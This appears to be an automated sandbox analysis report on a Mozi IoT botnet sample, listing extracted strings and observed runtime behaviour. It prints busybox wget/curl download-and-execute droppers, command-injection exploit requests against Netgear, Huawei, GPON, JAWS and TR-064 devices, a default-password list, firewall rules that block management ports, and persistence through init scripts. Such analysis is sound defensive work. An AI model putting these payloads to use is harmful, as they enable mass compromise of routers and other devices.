                Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
                Source: Initial sampleString containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
                Source: Initial sampleString containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
                Source: Initial sampleString containing potential weak password found: admin
                Source: Initial sampleString containing potential weak password found: default
                Source: Initial sampleString containing potential weak password found: support
                Source: Initial sampleString containing potential weak password found: service
                Source: Initial sampleString containing potential weak password found: supervisor
                Source: Initial sampleString containing potential weak password found: guest
                Source: Initial sampleString containing potential weak password found: administrator
                Source: Initial sampleString containing potential weak password found: 123456
                Source: Initial sampleString containing potential weak password found: 54321
                Source: Initial sampleString containing potential weak password found: password
                Source: Initial sampleString containing potential weak password found: 12345
                Source: Initial sampleString containing potential weak password found: admin1234
                Source: Initial samplePotential command found: POST /cdn-cgi/
                Source: Initial samplePotential command found: GET /c HTTP/1.0
                Source: Initial samplePotential command found: POST /cdn-cgi/ HTTP/1.1
                Source: Initial samplePotential command found: GET %s HTTP/1.1
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: Initial samplePotential command found: rm /home/httpd/web_shell_cmd.gch
                Source: Initial samplePotential command found: echo 3 > /usr/local/ct/ctadmincfg
                Source: Initial samplePotential command found: mount -o remount,rw /overlay /
                Source: Initial samplePotential command found: mv -f %s %s
                Source: Initial samplePotential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: GET /c
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: killall -9 %s
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
                Source: Initial samplePotential command found: killall -9 telnetd utelnetd scfgmgr
                Source: Initial samplePotential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
                Source: Initial samplePotential command found: GET /Mozi.6 HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.7 HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.c HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.m HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.x HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.a HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.s HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.p HTTP/1.0
                Source: Initial samplePotential command found: GET /%s HTTP/1.1
                Source: Initial samplePotential command found: POST /%s HTTP/1.1
                Source: Initial samplePotential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
                Source: Initial samplePotential command found: POST /picsdesc.xml HTTP/1.1
                Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: Initial samplePotential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                Source: Initial samplePotential command found: POST /UD/act?1 HTTP/1.1
                Source: Initial samplePotential command found: POST /HNAP1/ HTTP/1.0
                Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                Source: Initial samplePotential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
                Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
                Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: Mozi.m, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                Source: /usr/networks, type: DROPPEDMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                Source: classification engineClassification label: mal100.spre.troj.evad.linM@0/221@4/0

                Persistence and Installation Behavior:

                Executes the "iptables" command to insert, remove and/or manipulate rules
                Source: /bin/sh (PID: 4618)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4652)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4655)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4699)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4708)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4736)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4742)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4761)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4877)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4880)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4883)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4892)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4950)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4985)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 5011)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 5014)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 5019)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 5044)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5079)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5105)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5121)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5144)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5152)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5183)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5201)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5204)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5207)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5211)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5232)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5268)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5303)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5333)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT
                Sample reads /proc/mounts (often used for finding a writable filesystem)
                Source: /tmp/Mozi.m (PID: 4580) File: /proc/4580/mounts
                Sample tries to persist itself using /etc/profile
                Source: /tmp/Mozi.m (PID: 4580) File: /etc/profile.d/cedilla-portuguese.sh
                Source: /tmp/Mozi.m (PID: 4580) File: /etc/profile.d/apps-bin-path.sh
                Source: /tmp/Mozi.m (PID: 4580) File: /etc/profile.d/Z97-byobu.sh
                Source: /tmp/Mozi.m (PID: 4580) File: /etc/profile.d/bash_completion.sh
                Source: /tmp/Mozi.m (PID: 4580) File: /etc/profile.d/vte-2.91.sh
                Sample tries to persist itself using System V runlevels
                Source: /tmp/Mozi.m (PID: 4580) File: /etc/rcS.d/S95baby.sh
                Source: /tmp/Mozi.m (PID: 4580) File: /etc/rc.local
                Terminates several processes with shell command 'killall'
                Source: /bin/sh (PID: 4584)Killall command executed: killall -9 telnetd utelnetd scfgmgr
                Source: /tmp/Mozi.m (PID: 4582)Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
                Source: /tmp/Mozi.m (PID: 4616)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 4650)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 4653)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 4689)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 4702)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 56870 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 4728)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 4739)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 4750)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 4875)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
                Source: /tmp/Mozi.m (PID: 4878)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
                Source: /tmp/Mozi.m (PID: 4881)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
                Source: /tmp/Mozi.m (PID: 4885)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
                Source: /tmp/Mozi.m (PID: 4912)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
                Source: /tmp/Mozi.m (PID: 4925)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
                Source: /tmp/Mozi.m (PID: 4940)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
                Source: /tmp/Mozi.m (PID: 4975)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
                Source: /tmp/Mozi.m (PID: 5005)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
                Source: /tmp/Mozi.m (PID: 5012)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
                Source: /tmp/Mozi.m (PID: 5015)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
                Source: /tmp/Mozi.m (PID: 5035)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
                Source: /tmp/Mozi.m (PID: 5069)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
                Source: /tmp/Mozi.m (PID: 5097)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
                Source: /tmp/Mozi.m (PID: 5112)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
                Source: /tmp/Mozi.m (PID: 5139)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
                Source: /tmp/Mozi.m (PID: 5146)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
                Source: /tmp/Mozi.m (PID: 5169)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
                Source: /tmp/Mozi.m (PID: 5199)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 5202)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 5205)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 5208)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 5220)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 14165 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 5254)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 5290)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT"
                Source: /tmp/Mozi.m (PID: 5326)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT"
                Source: /bin/sh (PID: 4618)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4652)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4655)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4699)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4708)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4736)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4742)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4761)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4877)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4880)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4883)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4892)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4950)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4985)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 5011)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 5014)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 5019)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 5044)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5079)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5105)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5121)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5144)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5152)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5183)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5201)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5204)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5207)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5211)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5232)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5268)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5303)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5333)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT
                Source: /tmp/Mozi.m (PID: 4607)Reads from proc file: /proc/stat
                Source: /tmp/Mozi.m (PID: 4580)File: /usr/networks (bits: - usr: rx grp: rx all: rwx)
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)
                Source: /tmp/Mozi.m (PID: 4580)File written: /usr/networks
                Source: /tmp/Mozi.m (PID: 4580)Shell script file created: /etc/rcS.d/S95baby.sh
                Source: /tmp/Mozi.m (PID: 4580)Shell script file created: /etc/init.d/S95baby.sh
                Source: submitted sample Stderr:
                    telnetd: no process found
                    utelnetd: no process found
                    scfgmgr: no process found
                    Unsupported ioctl: cmd=0xffffffff80045705
                    Unsupported ioctl: cmd=0xffffffff80045705
                    qemu: Unsupported ARM syscall: 0x4ace97
                    qemu: uncaught target signal 4 (Illegal instruction) - core dumped
                    Unsupported ioctl: cmd=0xffffffff80045705
                    /bin/sh: 1: cfgtool: not found
                    /bin/sh: 1: cfgtool: not found
                    Unsupported ioctl: cmd=0xffffffff80045705
                    Unsupported ioctl: cmd=0xffffffff80045705
                    exit code = 0

                Hooking and other Techniques for Hiding and Protection:

                Drops files in suspicious directories
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/S95baby.sh
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/mountall.sh
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/checkfs.sh
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/umountnfs.sh
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/mountkernfs.sh
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/checkroot-bootclean.sh
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/mountnfs-bootclean.sh
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/bootmisc.sh
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/checkroot.sh
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/hwclock.sh
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/hostname.sh
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/mountdevsubfs.sh
